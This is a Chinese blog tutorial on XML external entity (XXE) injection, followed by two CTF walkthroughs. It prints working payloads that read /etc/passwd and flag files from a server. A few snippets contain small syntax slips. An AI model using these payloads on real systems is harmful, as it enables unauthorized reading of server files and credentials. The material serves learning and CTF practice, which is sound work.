XML外部实体注入（XEE）的原理和应用

不念不忘少年蓝@ 2021-09-21 10:32 341阅读 0赞

### 文章目录 ###

*  XXE注入
 *   *  一、XML简介
     *  二、XML实体
     *  三、CTF中XEE攻击

# XXE注入 #

> XXE注入全称是xml external entity 注入，也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取，命令执行等攻击。

## 一、XML简介 ##

XML是一种用户自定义的标记语言，主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD（document type define)来控制的。例如：

<?xml version="1.0"?> 
    <!DOCTYPE message [ 
    <!ELEMENT message(username,password)
    <!ELEMENT username(#PCDATA)> 
    <!ELEMENT password(#PCDATA)>
    ]>

上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素，后面的XML就要像如下的方式来书写。

## 二、XML实体 ##

上面的<!ELEMENT>中定义的是**元素**，也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个**变量**，到时候可以在XML中通过&符号来引用。

XML可分为**外部实体**和**内部实体**。首先来看内部实体：  
**示例：**

<? xml version="1.0"?>
    <!DOCTYPE message [ <!ELEMENT message ANY>
    <!ENTITY tst "test">
    ]>

其中元素定义的ANY说明接受任何元素，同时定义了一个xml实体（<! ENTITY>标签），这样就可以在XML文档中这样来写

外部实体  
**示例：**

<?xml version="1.0"?>
    <!DOCTYPE message [ <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <message>
        <user>&xxe;</user>
    </message>

这里用 **&实体名;** 引用实体，在DTD中定义，在XML文档中引用。

通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开，还可以分为**通用实体**和**参数实体**。

**1.通用实体:**

用 &实体名; 引用的实体，他在DTD 中定义，在 XML 文档中引用

**示例：**

<?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]
    <Profile>
     <msg>&file;</msg>
    </Profile>

**2.参数实体**

(1)使用 `% 实体名`(**这里面空格不能少**) 在 DTD 中定义，并且**只能在 DTD 中使用 `%实体名;` 引用**  
(2)只有在 DTD 文件中，参数实体的声明才能引用其他实体  
(3)和通用实体一样，参数实体也可以外部引用

**示例：**

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
    <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
    %an-element; %remote-dtd;

## 三、CTF中XEE攻击 ##

1.题目地址：Jarvis http://web.jarvisoj.com:32794/

打开链接，输入数据后抓包：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center]  
发现传的是JSON数据，考虑修改一下上传文件类型为XML类型。构造外部实体，实现XXE攻击。将ContentType字段改为:application/xml,然后在请求内容中加上如下的payload:

<?xml version="1.0" ?>
    <!DOCTYPE message [ <!ENTITY shell SYSTEM "file///etc/passwd">
    ]>
    <message>&shell;</message>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 1]  
发现了/home/ctf路径。改一下file的路径：file:///home/ctf/flag.txt。即可得到flag  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 2]

2.题目地址：https://buuoj.cn/challenges (Fake XML cookbook)  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 3]  
抓包后，发现上传的是XML类型的数据  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 4]  
直接构造XML外部实体，读flag。payload如下：

<?xml version="1.0"?>
    <!DOCTYPE user[ <!ENTITY admin SYSTEM "file:///flag">
    ]>
    <user><username>&admin;</username><password>passwd</password></user>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 5]

**参考文章**  
https://xz.aliyun.com/t/3357  
https://www.freebuf.com/vuls/175451.html

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center]: /images/20210920/fea0ecd292464264aa796f3c0eaa4709.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20210920/c740882c83e040b1bd12f9b49f663a62.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20210920/b830bcaf2e7440d8ab08ae084cd6d38a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20210920/22d2417294ac442fadd11eb9e214239c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20210920/066787f644f54e4c9318c3586980df10.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ljemZ5NTg1_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20210920/bb7f5bb3a3d04bbabe5c54676577b6fb.png